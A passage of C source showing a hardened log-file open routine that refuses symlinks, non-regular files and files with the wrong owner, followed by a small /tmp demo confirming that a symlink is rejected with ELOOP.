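 *  - O_NOFOLLOW: a symbolic link at the final path component fails with ELOOP.
 *  - O_NOCTTY:   never acquire a controlling terminal if the name is a tty.
 *  - fstat(fd):  inspects the opened inode, so a later rename or link swap
 *                cannot change what is being examined.
 * Returns the descriptor, or -1 with errno set. */
int open_log_safely(const char *path, uid_t expected_owner)
{
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_NOCTTY | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0) {
        int e = errno; close(fd); errno = e;
        return -1;
    }
    if (!S_ISREG(st.st_mode) || st.st_uid != expected_owner) {
        close(fd);
        errno = EPERM;                     /* not a regular file owned by the caller */
        return -1;
    }
    return fd;
}

/* Demo with constructed files in /tmp: a regular file we own is accepted,
 * a symlink pointing at that same file is refused with ELOOP.
 * Returns 1 on exactly that outcome, 0 otherwise. */
int demo_symlink_refused(void)
{
    char real[] = "/tmp/logfile_realXXXXXX";
    char lnk[sizeof real + 4];
    int fd = mkstemp(real);
    if (fd < 0)
        return 0;
    close(fd);
    snprintf(lnk, sizeof lnk, "%s.lnk", real);
    int ok = 0;
    if (symlink(real, lnk) == 0) {
        int good = open_log_safely(real, geteuid());
        int bad  = open_log_safely(lnk, geteuid());
        int bad_errno = errno;
        ok = good >= 0 && bad < 0 && bad_errno == ELOOP;
        if (good >= 0)
            close(good);
        unlink(lnk);
    }
    unlink(real);
    return ok;
}

int main(void)
{
    printf("regular file accepted, symlink refused: %d\n", demo_symlink_refused());
    return 0;
}
```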